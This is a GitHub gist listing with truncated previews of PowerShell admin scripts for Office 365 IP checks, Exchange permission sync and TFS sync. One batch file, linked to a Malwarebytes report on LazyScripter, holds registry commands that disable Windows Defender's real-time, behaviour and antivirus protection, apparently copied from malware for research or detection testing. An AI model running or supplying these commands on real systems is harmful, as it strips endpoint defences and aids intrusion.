Fabian Bader f-bader

f-bader / Test-IsO365IpAddress.ps1
Created Aug 23, 2019
Test if an IP address is part of the Office 365 endpoints
View Test-IsO365IpAddress.ps1
[CmdletBinding()]
param (
# IP Address to check against Office 365 Range
[Parameter(Mandatory = $true,
ValueFromPipeline = $true,
Position = 0)]
$IPAddress,
# Port to check
[Parameter(Mandatory = $false,
View SyncExchangeOnPremSendAsPermissions.ps1
<#
This script syncs SendAs permissions from Exchange on-Prem to Exchange Online to avoid a misconfigured hybrid environment
Uses Azure Automation for scheduling and safely storing the on-Prem credentials as well as the authentication certificate for Exchange Online
Prerequisites
* Azure Automation Account
* Hybrid Worker
* Setup App-only authentication (https://docs.microsoft.com/en-us/powershell/exchange/app-only-auth-powershell-v2)
* Install private certificate as exportable to Azure Automation Account as 'Exchange Hybrid Automation'
* Store OnPrem Exchange credentials in Azure Automation Account as 'Exchange onPrem'
View disablethings.bat
### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime
f-bader / Sync-TfsIdentity.ps1
Last active Mar 17, 2021 — forked from jstangroome/Sync-TfsIdentity.ps1
Force TFS 2018 to synchronize Active Directory group memberships
View Sync-TfsIdentity.ps1
[CmdletBinding()]
param (
[Parameter(Mandatory=$true, Position=0)]
[uri]
$ServerUri
)
$ErrorActionPreference = 'Stop'
Set-StrictMode -Version Latest